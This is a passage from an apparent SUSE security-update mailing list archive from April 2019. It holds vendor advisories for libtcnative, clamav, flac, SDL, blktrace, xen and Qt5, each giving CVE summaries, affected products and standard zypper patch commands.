libsqlite3-0-debuginfo-32bit-3.8.10.2-9.3.1 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): libsqlite3-0-3.8.10.2-9.3.1 libsqlite3-0-32bit-3.8.10.2-9.3.1 libsqlite3-0-debuginfo-3.8.10.2-9.3.1 libsqlite3-0-debuginfo-32bit-3.8.10.2-9.3.1 sqlite3-3.8.10.2-9.3.1 sqlite3-debuginfo-3.8.10.2-9.3.1 sqlite3-debugsource-3.8.10.2-9.3.1 - SUSE Linux Enterprise Desktop 12-SP3 (x86_64): libsqlite3-0-3.8.10.2-9.3.1 libsqlite3-0-32bit-3.8.10.2-9.3.1 libsqlite3-0-debuginfo-3.8.10.2-9.3.1 libsqlite3-0-debuginfo-32bit-3.8.10.2-9.3.1 sqlite3-3.8.10.2-9.3.1 sqlite3-debuginfo-3.8.10.2-9.3.1 sqlite3-debugsource-3.8.10.2-9.3.1 - SUSE Enterprise Storage 4 (x86_64): libsqlite3-0-3.8.10.2-9.3.1 libsqlite3-0-32bit-3.8.10.2-9.3.1 libsqlite3-0-debuginfo-3.8.10.2-9.3.1 libsqlite3-0-debuginfo-32bit-3.8.10.2-9.3.1 sqlite3-3.8.10.2-9.3.1 sqlite3-debuginfo-3.8.10.2-9.3.1 sqlite3-debugsource-3.8.10.2-9.3.1 - SUSE CaaS Platform ALL (x86_64): libsqlite3-0-3.8.10.2-9.3.1 libsqlite3-0-debuginfo-3.8.10.2-9.3.1 sqlite3-debuginfo-3.8.10.2-9.3.1 sqlite3-debugsource-3.8.10.2-9.3.1 - SUSE CaaS Platform 3.0 (x86_64): libsqlite3-0-3.8.10.2-9.3.1 libsqlite3-0-debuginfo-3.8.10.2-9.3.1 sqlite3-debuginfo-3.8.10.2-9.3.1 sqlite3-debugsource-3.8.10.2-9.3.1 - OpenStack Cloud Magnum Orchestration 7 (x86_64): libsqlite3-0-3.8.10.2-9.3.1 libsqlite3-0-debuginfo-3.8.10.2-9.3.1 sqlite3-debuginfo-3.8.10.2-9.3.1 sqlite3-debugsource-3.8.10.2-9.3.1 References: https://www.suse.com/security/cve/CVE-2018-20346.html https://www.suse.com/security/cve/CVE-2018-20506.html https://bugzilla.suse.com/1119687 https://bugzilla.suse.com/1131576 From sle-security-updates at lists.suse.com Tue Apr 9 07:10:44 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 9 Apr 2019 15:10:44 +0200 (CEST) Subject: SUSE-SU-2019:14014-1: important: Security update for libtcnative-1-0 Message-ID: <20190409131044.296071012B@maintenance.suse.de> SUSE Security Update: Security update for libtcnative-1-0 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:14014-1 Rating: important References: #1078679 #1103347 #1103348 Cross-References: CVE-2017-15698 CVE-2018-8019 CVE-2018-8020 Affected Products: SUSE Linux Enterprise Server 11-SP4-LTSS SUSE Linux Enterprise Point of Sale 11-SP3 SUSE Linux Enterprise Debuginfo 11-SP4 SUSE Linux Enterprise Debuginfo 11-SP3 ______________________________________________________________________________ An update that fixes three vulnerabilities is now available. Description: This update for libtcnative-1-0 to version 1.1.34 fixes the following issues: - CVE-2017-15698: Fixed an improper handling of fields with more than 127 bytes which could allow invalid client certificates to be accepted (bsc#1078679). - CVE-2018-8019: When using an OCSP responder did not correctly handle invalid responses. This allowed for revoked client certificates to be incorrectly identified. It was therefore possible for users to authenticate with revoked certificates when using mutual TLS (bsc#1103348). - CVE-2018-8020: Did not properly check OCSP pre-produced responses. Revoked client certificates may have not been properly identified, allowing for users to authenticate with revoked certificates to connections that require mutual TLS (bsc#1103347). For a complete list of changes please see http://tomcat.apache.org/native-1.1-doc/miscellaneous/changelog.html Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server 11-SP4-LTSS: zypper in -t patch slessp4-libtcnative-1-0-14014=1 - SUSE Linux Enterprise Point of Sale 11-SP3: zypper in -t patch sleposp3-libtcnative-1-0-14014=1 - SUSE Linux Enterprise Debuginfo 11-SP4: zypper in -t patch dbgsp4-libtcnative-1-0-14014=1 - SUSE Linux Enterprise Debuginfo 11-SP3: zypper in -t patch dbgsp3-libtcnative-1-0-14014=1 Package List: - SUSE Linux Enterprise Server 11-SP4-LTSS (i586 ppc64 s390x x86_64): libtcnative-1-0-1.3.4-12.5.5.2 - SUSE Linux Enterprise Point of Sale 11-SP3 (i586): libtcnative-1-0-1.3.4-12.5.5.2 - SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ppc64 s390x x86_64): libtcnative-1-0-debuginfo-1.3.4-12.5.5.2 libtcnative-1-0-debugsource-1.3.4-12.5.5.2 - SUSE Linux Enterprise Debuginfo 11-SP3 (i586 s390x x86_64): libtcnative-1-0-debuginfo-1.3.4-12.5.5.2 libtcnative-1-0-debugsource-1.3.4-12.5.5.2 References: https://www.suse.com/security/cve/CVE-2017-15698.html https://www.suse.com/security/cve/CVE-2018-8019.html https://www.suse.com/security/cve/CVE-2018-8020.html https://bugzilla.suse.com/1078679 https://bugzilla.suse.com/1103347 https://bugzilla.suse.com/1103348 From sle-security-updates at lists.suse.com Tue Apr 9 10:10:19 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 9 Apr 2019 18:10:19 +0200 (CEST) Subject: SUSE-SU-2019:14015-1: important: Security update for clamav Message-ID: <20190409161019.BD205FF2D@maintenance.suse.de> SUSE Security Update: Security update for clamav ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:14015-1 Rating: important References: #1130721 Cross-References: CVE-2019-1787 CVE-2019-1788 CVE-2019-1789 Affected Products: SUSE Linux Enterprise Server 11-SP4-LTSS SUSE Linux Enterprise Point of Sale 11-SP3 SUSE Linux Enterprise Debuginfo 11-SP4 SUSE Linux Enterprise Debuginfo 11-SP3 ______________________________________________________________________________ An update that fixes three vulnerabilities is now available. Description: This update for clamav to version 0.100.3 fixes the following issues: Security issues fixed (bsc#1130721): - CVE-2019-1787: Fixed an out-of-bounds heap read condition which may occur when scanning PDF documents. - CVE-2019-1789: Fixed an out-of-bounds heap read condition which may occur when scanning PE files (i.e. Windows EXE and DLL files). - CVE-2019-1788: Fixed an out-of-bounds heap write condition which may occur when scanning OLE2 files such as Microsoft Office 97-2003 documents. Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server 11-SP4-LTSS: zypper in -t patch slessp4-clamav-14015=1 - SUSE Linux Enterprise Point of Sale 11-SP3: zypper in -t patch sleposp3-clamav-14015=1 - SUSE Linux Enterprise Debuginfo 11-SP4: zypper in -t patch dbgsp4-clamav-14015=1 - SUSE Linux Enterprise Debuginfo 11-SP3: zypper in -t patch dbgsp3-clamav-14015=1 Package List: - SUSE Linux Enterprise Server 11-SP4-LTSS (i586 ppc64 s390x x86_64): clamav-0.100.3-0.20.21.1 - SUSE Linux Enterprise Point of Sale 11-SP3 (i586): clamav-0.100.3-0.20.21.1 - SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ppc64 s390x x86_64): clamav-debuginfo-0.100.3-0.20.21.1 clamav-debugsource-0.100.3-0.20.21.1 - SUSE Linux Enterprise Debuginfo 11-SP3 (i586 s390x x86_64): clamav-debuginfo-0.100.3-0.20.21.1 clamav-debugsource-0.100.3-0.20.21.1 References: https://www.suse.com/security/cve/CVE-2019-1787.html https://www.suse.com/security/cve/CVE-2019-1788.html https://www.suse.com/security/cve/CVE-2019-1789.html https://bugzilla.suse.com/1130721 From sle-security-updates at lists.suse.com Tue Apr 9 10:10:19 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 9 Apr 2019 18:10:19 +0200 (CEST) Subject: SUSE-SU-2019:14015-1: important: Security update for clamav Message-ID: <20190409161019.BD205FF2D@maintenance.suse.de> SUSE Security Update: Security update for clamav ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:14015-1 Rating: important References: #1130721 Cross-References: CVE-2019-1787 CVE-2019-1788 CVE-2019-1789 Affected Products: SUSE Linux Enterprise Server 11-SP4-LTSS SUSE Linux Enterprise Point of Sale 11-SP3 SUSE Linux Enterprise Debuginfo 11-SP4 SUSE Linux Enterprise Debuginfo 11-SP3 ______________________________________________________________________________ An update that fixes three vulnerabilities is now available. Description: This update for clamav to version 0.100.3 fixes the following issues: Security issues fixed (bsc#1130721): - CVE-2019-1787: Fixed an out-of-bounds heap read condition which may occur when scanning PDF documents. - CVE-2019-1789: Fixed an out-of-bounds heap read condition which may occur when scanning PE files (i.e. Windows EXE and DLL files). - CVE-2019-1788: Fixed an out-of-bounds heap write condition which may occur when scanning OLE2 files such as Microsoft Office 97-2003 documents. Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server 11-SP4-LTSS: zypper in -t patch slessp4-clamav-14015=1 - SUSE Linux Enterprise Point of Sale 11-SP3: zypper in -t patch sleposp3-clamav-14015=1 - SUSE Linux Enterprise Debuginfo 11-SP4: zypper in -t patch dbgsp4-clamav-14015=1 - SUSE Linux Enterprise Debuginfo 11-SP3: zypper in -t patch dbgsp3-clamav-14015=1 Package List: - SUSE Linux Enterprise Server 11-SP4-LTSS (i586 ppc64 s390x x86_64): clamav-0.100.3-0.20.21.1 - SUSE Linux Enterprise Point of Sale 11-SP3 (i586): clamav-0.100.3-0.20.21.1 - SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ppc64 s390x x86_64): clamav-debuginfo-0.100.3-0.20.21.1 clamav-debugsource-0.100.3-0.20.21.1 - SUSE Linux Enterprise Debuginfo 11-SP3 (i586 s390x x86_64): clamav-debuginfo-0.100.3-0.20.21.1 clamav-debugsource-0.100.3-0.20.21.1 References: https://www.suse.com/security/cve/CVE-2019-1787.html https://www.suse.com/security/cve/CVE-2019-1788.html https://www.suse.com/security/cve/CVE-2019-1789.html https://bugzilla.suse.com/1130721 From sle-security-updates at lists.suse.com Tue Apr 9 13:09:31 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 9 Apr 2019 21:09:31 +0200 (CEST) Subject: SUSE-SU-2019:0920-1: Security update for flac Message-ID: <20190409190931.70D83F7BB@maintenance.suse.de> SUSE Security Update: Security update for flac ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0920-1 Rating: low References: #1091045 Cross-References: CVE-2017-6888 Affected Products: SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 SUSE Linux Enterprise Module for Basesystem 15 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for flac fixes the following issues: - CVE-2017-6888: An error in the "read_metadata_vorbiscomment_()" function could be exploited to cause a memory leak via a specially crafted FLAC file (bsc#1091045). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-920=1 - SUSE Linux Enterprise Module for Basesystem 15: zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-920=1 Package List: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): flac-1.3.2-3.3.20 flac-debuginfo-1.3.2-3.3.20 flac-debugsource-1.3.2-3.3.20 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (noarch): flac-doc-1.3.2-3.3.20 - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64): flac-debuginfo-1.3.2-3.3.20 flac-debugsource-1.3.2-3.3.20 flac-devel-1.3.2-3.3.20 libFLAC++6-1.3.2-3.3.20 libFLAC++6-debuginfo-1.3.2-3.3.20 libFLAC8-1.3.2-3.3.20 libFLAC8-debuginfo-1.3.2-3.3.20 References: https://www.suse.com/security/cve/CVE-2017-6888.html https://bugzilla.suse.com/1091045 From sle-security-updates at lists.suse.com Tue Apr 9 13:10:38 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 9 Apr 2019 21:10:38 +0200 (CEST) Subject: SUSE-SU-2019:0917-1: moderate: Security update for SDL Message-ID: <20190409191038.23ECBF7BB@maintenance.suse.de> SUSE Security Update: Security update for SDL ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0917-1 Rating: moderate References: #1124799 #1124800 #1124802 #1124803 #1124805 #1124806 #1124824 #1124825 #1124826 #1124827 #1125099 Cross-References: CVE-2019-7572 CVE-2019-7573 CVE-2019-7574 CVE-2019-7575 CVE-2019-7576 CVE-2019-7577 CVE-2019-7578 CVE-2019-7635 CVE-2019-7636 CVE-2019-7637 CVE-2019-7638 Affected Products: SUSE Linux Enterprise Module for Desktop Applications 15 ______________________________________________________________________________ An update that fixes 11 vulnerabilities is now available. Description: This update for SDL fixes the following issues: Security issues fixed: - CVE-2019-7572: Fixed a buffer over-read in IMA_ADPCM_nibble in audio/SDL_wave.c.(bsc#1124806). - CVE-2019-7578: Fixed a heap-based buffer over-read in InitIMA_ADPCM in audio/SDL_wave.c (bsc#1125099). - CVE-2019-7576: Fixed heap-based buffer over-read in InitMS_ADPCM in audio/SDL_wave.c (bsc#1124799). - CVE-2019-7573: Fixed a heap-based buffer over-read in InitMS_ADPCM in audio/SDL_wave.c (bsc#1124805). - CVE-2019-7635: Fixed a heap-based buffer over-read in Blit1to4 in video/SDL_blit_1.c. (bsc#1124827). - CVE-2019-7636: Fixed a heap-based buffer over-read in SDL_GetRGB in video/SDL_pixels.c (bsc#1124826). - CVE-2019-7638: Fixed a heap-based buffer over-read in Map1toN in video/SDL_pixels.c (bsc#1124824). - CVE-2019-7574: Fixed a heap-based buffer over-read in IMA_ADPCM_decode in audio/SDL_wave.c (bsc#1124803). - CVE-2019-7575: Fixed a heap-based buffer overflow in MS_ADPCM_decode in audio/SDL_wave.c (bsc#1124802). - CVE-2019-7637: Fixed a heap-based buffer overflow in SDL_FillRect function in SDL_surface.c (bsc#1124825). - CVE-2019-7577: Fixed a buffer over read in SDL_LoadWAV_RW in audio/SDL_wave.c (bsc#1124800). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Desktop Applications 15: zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-917=1 Package List: - SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64): SDL-debugsource-1.2.15-3.9.1 libSDL-1_2-0-1.2.15-3.9.1 libSDL-1_2-0-debuginfo-1.2.15-3.9.1 libSDL-devel-1.2.15-3.9.1 References: https://www.suse.com/security/cve/CVE-2019-7572.html https://www.suse.com/security/cve/CVE-2019-7573.html https://www.suse.com/security/cve/CVE-2019-7574.html https://www.suse.com/security/cve/CVE-2019-7575.html https://www.suse.com/security/cve/CVE-2019-7576.html https://www.suse.com/security/cve/CVE-2019-7577.html https://www.suse.com/security/cve/CVE-2019-7578.html https://www.suse.com/security/cve/CVE-2019-7635.html https://www.suse.com/security/cve/CVE-2019-7636.html https://www.suse.com/security/cve/CVE-2019-7637.html https://www.suse.com/security/cve/CVE-2019-7638.html https://bugzilla.suse.com/1124799 https://bugzilla.suse.com/1124800 https://bugzilla.suse.com/1124802 https://bugzilla.suse.com/1124803 https://bugzilla.suse.com/1124805 https://bugzilla.suse.com/1124806 https://bugzilla.suse.com/1124824 https://bugzilla.suse.com/1124825 https://bugzilla.suse.com/1124826 https://bugzilla.suse.com/1124827 https://bugzilla.suse.com/1125099 From sle-security-updates at lists.suse.com Tue Apr 9 16:09:34 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Wed, 10 Apr 2019 00:09:34 +0200 (CEST) Subject: SUSE-SU-2019:0919-1: Security update for blktrace Message-ID: <20190409220934.74BE0F7BB@maintenance.suse.de> SUSE Security Update: Security update for blktrace ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0919-1 Rating: low References: #1091942 Cross-References: CVE-2018-10689 Affected Products: SUSE Linux Enterprise Module for Development Tools 15 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for blktrace fixes the following issues: - CVE-2018-10689: Prevent buffer overflow in the dev_map_read function because the device and devno arrays were too small (bsc#1091942) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-15-2019-919=1 Package List: - SUSE Linux Enterprise Module for Development Tools 15 (aarch64 ppc64le s390x x86_64): blktrace-1.1.0+git.20170126-3.3.28 blktrace-debuginfo-1.1.0+git.20170126-3.3.28 blktrace-debugsource-1.1.0+git.20170126-3.3.28 References: https://www.suse.com/security/cve/CVE-2018-10689.html https://bugzilla.suse.com/1091942 From sle-security-updates at lists.suse.com Wed Apr 10 07:09:09 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Wed, 10 Apr 2019 15:09:09 +0200 (CEST) Subject: SUSE-SU-2019:0921-1: important: Security update for xen Message-ID: <20190410130909.0323C1013C@maintenance.suse.de> SUSE Security Update: Security update for xen ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0921-1 Rating: important References: #1026236 #1114988 #1123157 #1126140 #1126141 #1126192 #1126195 #1126196 #1126198 #1126201 #1127400 #1129623 Cross-References: CVE-2018-19967 CVE-2019-6778 CVE-2019-9824 Affected Products: SUSE OpenStack Cloud 7 SUSE Linux Enterprise Server for SAP 12-SP2 SUSE Linux Enterprise Server 12-SP2-LTSS SUSE Linux Enterprise Server 12-SP2-BCL SUSE Enterprise Storage 4 ______________________________________________________________________________ An update that solves three vulnerabilities and has 9 fixes is now available. Description: This update for xen fixes the following issues: Security issues fixed: - Fixed an issue which could allow malicious PV guests may cause a host crash or gain access to data pertaining to other guests.Additionally, vulnerable configurations are likely to be unstable even in the absence of an attack (bsc#1126198). - Fixed multiple access violations introduced by XENMEM_exchange hypercall which could allow a single PV guest to leak arbitrary amounts of memory, leading to a denial of service (bsc#1126192). - Fixed an issue which could allow a malicious unprivileged guest userspace process to escalate its privilege to that of other userspace processes in the same guest and potentially thereby to that of the guest operating system (bsc#1126201). - Fixed an issue which could allow a malicious or buggy x86 PV guest kernels can mount a Denial of Service attack affecting the whole system (bsc#1126196). - Fixed an issue which could allow an untrusted PV domain with access to a physical device to DMA into its own pagetables leading to privilege escalation (bsc#1126195). - CVE-2019-6778: Fixed a heap buffer overflow in tcp_emu() found in slirp (bsc#1123157). - Fixed an issue which could allow malicious 64bit PV guests to cause a host crash (bsc#1127400). - Fixed an issue which could allow malicious or buggy guests with passed through PCI devices to be able to escalate their privileges, crash the host, or access data belonging to other guests. Additionally memory leaks were also possible (bsc#1126140). - Fixed a race condition issue which could allow malicious PV guests to escalate their privilege to that of the hypervisor (bsc#1126141). - CVE-2019-9824: Fixed an information leak in SLiRP networking implementation which could allow a user/process to read uninitialised stack memory contents (bsc#1129623). - CVE-2018-19967: Fixed HLE constructs that allowed guests to lock up the host, resulting in a Denial of Service (DoS). (XSA-282) (bsc#1114988) Other issue addressed: - Added Xen cmdline option "suse_vtsc_tolerance" to avoid TSC emulation for HVM domUs (bsc#1026236). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE OpenStack Cloud 7: zypper in -t patch SUSE-OpenStack-Cloud-7-2019-921=1 - SUSE Linux Enterprise Server for SAP 12-SP2: zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-921=1 - SUSE Linux Enterprise Server 12-SP2-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-921=1 - SUSE Linux Enterprise Server 12-SP2-BCL: zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-921=1 - SUSE Enterprise Storage 4: zypper in -t patch SUSE-Storage-4-2019-921=1 Package List: - SUSE OpenStack Cloud 7 (x86_64): xen-4.7.6_06-43.48.1 xen-debugsource-4.7.6_06-43.48.1 xen-doc-html-4.7.6_06-43.48.1 xen-libs-32bit-4.7.6_06-43.48.1 xen-libs-4.7.6_06-43.48.1 xen-libs-debuginfo-32bit-4.7.6_06-43.48.1 xen-libs-debuginfo-4.7.6_06-43.48.1 xen-tools-4.7.6_06-43.48.1 xen-tools-debuginfo-4.7.6_06-43.48.1 xen-tools-domU-4.7.6_06-43.48.1 xen-tools-domU-debuginfo-4.7.6_06-43.48.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (x86_64): xen-4.7.6_06-43.48.1 xen-debugsource-4.7.6_06-43.48.1 xen-doc-html-4.7.6_06-43.48.1 xen-libs-32bit-4.7.6_06-43.48.1 xen-libs-4.7.6_06-43.48.1 xen-libs-debuginfo-32bit-4.7.6_06-43.48.1 xen-libs-debuginfo-4.7.6_06-43.48.1 xen-tools-4.7.6_06-43.48.1 xen-tools-debuginfo-4.7.6_06-43.48.1 xen-tools-domU-4.7.6_06-43.48.1 xen-tools-domU-debuginfo-4.7.6_06-43.48.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (x86_64): xen-4.7.6_06-43.48.1 xen-debugsource-4.7.6_06-43.48.1 xen-doc-html-4.7.6_06-43.48.1 xen-libs-32bit-4.7.6_06-43.48.1 xen-libs-4.7.6_06-43.48.1 xen-libs-debuginfo-32bit-4.7.6_06-43.48.1 xen-libs-debuginfo-4.7.6_06-43.48.1 xen-tools-4.7.6_06-43.48.1 xen-tools-debuginfo-4.7.6_06-43.48.1 xen-tools-domU-4.7.6_06-43.48.1 xen-tools-domU-debuginfo-4.7.6_06-43.48.1 - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64): xen-4.7.6_06-43.48.1 xen-debugsource-4.7.6_06-43.48.1 xen-doc-html-4.7.6_06-43.48.1 xen-libs-32bit-4.7.6_06-43.48.1 xen-libs-4.7.6_06-43.48.1 xen-libs-debuginfo-32bit-4.7.6_06-43.48.1 xen-libs-debuginfo-4.7.6_06-43.48.1 xen-tools-4.7.6_06-43.48.1 xen-tools-debuginfo-4.7.6_06-43.48.1 xen-tools-domU-4.7.6_06-43.48.1 xen-tools-domU-debuginfo-4.7.6_06-43.48.1 - SUSE Enterprise Storage 4 (x86_64): xen-4.7.6_06-43.48.1 xen-debugsource-4.7.6_06-43.48.1 xen-doc-html-4.7.6_06-43.48.1 xen-libs-32bit-4.7.6_06-43.48.1 xen-libs-4.7.6_06-43.48.1 xen-libs-debuginfo-32bit-4.7.6_06-43.48.1 xen-libs-debuginfo-4.7.6_06-43.48.1 xen-tools-4.7.6_06-43.48.1 xen-tools-debuginfo-4.7.6_06-43.48.1 xen-tools-domU-4.7.6_06-43.48.1 xen-tools-domU-debuginfo-4.7.6_06-43.48.1 References: https://www.suse.com/security/cve/CVE-2018-19967.html https://www.suse.com/security/cve/CVE-2019-6778.html https://www.suse.com/security/cve/CVE-2019-9824.html https://bugzilla.suse.com/1026236 https://bugzilla.suse.com/1114988 https://bugzilla.suse.com/1123157 https://bugzilla.suse.com/1126140 https://bugzilla.suse.com/1126141 https://bugzilla.suse.com/1126192 https://bugzilla.suse.com/1126195 https://bugzilla.suse.com/1126196 https://bugzilla.suse.com/1126198 https://bugzilla.suse.com/1126201 https://bugzilla.suse.com/1127400 https://bugzilla.suse.com/1129623 From sle-security-updates at lists.suse.com Wed Apr 10 13:09:07 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Wed, 10 Apr 2019 21:09:07 +0200 (CEST) Subject: SUSE-SU-2019:0927-1: moderate: Security update for libqt5-qtbase Message-ID: <20190410190907.939901013C@maintenance.suse.de> SUSE Security Update: Security update for libqt5-qtbase ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0927-1 Rating: moderate References: #1108889 #1118597 #1129662 #1130246 Cross-References: CVE-2018-19870 CVE-2018-19872 Affected Products: SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 SUSE Linux Enterprise Module for Desktop Applications 15 SUSE Linux Enterprise Module for Basesystem 15 ______________________________________________________________________________ An update that solves two vulnerabilities and has two fixes is now available. Description: This update for libqt5-qtbase fixes the following issues: Security issues fixed: - CVE-2018-19872: Fixed an issue which could allow a division by zero leading to crash (bsc#1130246). - CVE-2018-19870: Fixed an improper check in QImage allocation which could allow Denial of Service when opening crafted gif files (bsc#1118597). Other issue addressed: - Fixed an issue which showing remote locations was not allowed (bsc#1129662). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-927=1 - SUSE Linux Enterprise Module for Desktop Applications 15: zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-927=1 - SUSE Linux Enterprise Module for Basesystem 15: zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-927=1 Package List: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): libQt5Bootstrap-devel-static-5.9.4-8.18.2 libqt5-qtbase-debugsource-5.9.4-8.18.2 libqt5-qtbase-examples-5.9.4-8.18.2 libqt5-qtbase-examples-debuginfo-5.9.4-8.18.2 - SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64): libQt5OpenGLExtensions-devel-static-5.9.4-8.18.2 libQt5Sql5-mysql-5.9.4-8.18.2 libQt5Sql5-mysql-debuginfo-5.9.4-8.18.2 libQt5Sql5-postgresql-5.9.4-8.18.2 libQt5Sql5-postgresql-debuginfo-5.9.4-8.18.2 libQt5Sql5-unixODBC-5.9.4-8.18.2 libQt5Sql5-unixODBC-debuginfo-5.9.4-8.18.2 libqt5-qtbase-debugsource-5.9.4-8.18.2 libqt5-qtbase-platformtheme-gtk3-5.9.4-8.18.2 libqt5-qtbase-platformtheme-gtk3-debuginfo-5.9.4-8.18.2 - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64): libQt5Concurrent-devel-5.9.4-8.18.2 libQt5Concurrent5-5.9.4-8.18.2 libQt5Concurrent5-debuginfo-5.9.4-8.18.2 libQt5Core-devel-5.9.4-8.18.2 libQt5Core5-5.9.4-8.18.2 libQt5Core5-debuginfo-5.9.4-8.18.2 libQt5DBus-devel-5.9.4-8.18.2 libQt5DBus-devel-debuginfo-5.9.4-8.18.2 libQt5DBus5-5.9.4-8.18.2 libQt5DBus5-debuginfo-5.9.4-8.18.2 libQt5Gui-devel-5.9.4-8.18.2 libQt5Gui5-5.9.4-8.18.2 libQt5Gui5-debuginfo-5.9.4-8.18.2 libQt5KmsSupport-devel-static-5.9.4-8.18.2 libQt5Network-devel-5.9.4-8.18.2 libQt5Network5-5.9.4-8.18.2 libQt5Network5-debuginfo-5.9.4-8.18.2 libQt5OpenGL-devel-5.9.4-8.18.2 libQt5OpenGL5-5.9.4-8.18.2 libQt5OpenGL5-debuginfo-5.9.4-8.18.2 libQt5PlatformHeaders-devel-5.9.4-8.18.2 libQt5PlatformSupport-devel-static-5.9.4-8.18.2 libQt5PrintSupport-devel-5.9.4-8.18.2 libQt5PrintSupport5-5.9.4-8.18.2 libQt5PrintSupport5-debuginfo-5.9.4-8.18.2 libQt5Sql-devel-5.9.4-8.18.2 libQt5Sql5-5.9.4-8.18.2 libQt5Sql5-debuginfo-5.9.4-8.18.2 libQt5Sql5-sqlite-5.9.4-8.18.2 libQt5Sql5-sqlite-debuginfo-5.9.4-8.18.2 libQt5Test-devel-5.9.4-8.18.2 libQt5Test5-5.9.4-8.18.2 libQt5Test5-debuginfo-5.9.4-8.18.2 libQt5Widgets-devel-5.9.4-8.18.2 libQt5Widgets5-5.9.4-8.18.2 libQt5Widgets5-debuginfo-5.9.4-8.18.2 libQt5Xml-devel-5.9.4-8.18.2 libQt5Xml5-5.9.4-8.18.2 libQt5Xml5-debuginfo-5.9.4-8.18.2 libqt5-qtbase-common-devel-5.9.4-8.18.2 libqt5-qtbase-common-devel-debuginfo-5.9.4-8.18.2 libqt5-qtbase-debugsource-5.9.4-8.18.2 libqt5-qtbase-devel-5.9.4-8.18.2 - SUSE Linux Enterprise Module for Basesystem 15 (noarch): libQt5Core-private-headers-devel-5.9.4-8.18.2 libQt5DBus-private-headers-devel-5.9.4-8.18.2 libQt5Gui-private-headers-devel-5.9.4-8.18.2 libQt5KmsSupport-private-headers-devel-5.9.4-8.18.2 libQt5Network-private-headers-devel-5.9.4-8.18.2 libQt5OpenGL-private-headers-devel-5.9.4-8.18.2 libQt5PlatformSupport-private-headers-devel-5.9.4-8.18.2 libQt5PrintSupport-private-headers-devel-5.9.4-8.18.2 libQt5Sql-private-headers-devel-5.9.4-8.18.2 libQt5Test-private-headers-devel-5.9.4-8.18.2 libQt5Widgets-private-headers-devel-5.9.4-8.18.2 libqt5-qtbase-private-headers-devel-5.9.4-8.18.2 References: https://www.suse.com/security/cve/CVE-2018-19870.html https://www.suse.com/security/cve/CVE-2018-19872.html https://bugzilla.suse.com/1108889 https://bugzilla.suse.com/1118597 https://bugzilla.suse.com/1129662 https://bugzilla.suse.com/1130246 From sle-security-updates at lists.suse.com Wed Apr 10 13:12:48 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Wed, 10 Apr 2019 21:12:48 +0200 (CEST) Subject: SUSE-SU-2019:0926-1: moderate: Security update for tar Message-ID: <20190410191248.04D311013C@maintenance.suse.de> SUSE Security Update: Security update for tar ______________________________________________________________________________ Announcement ID: 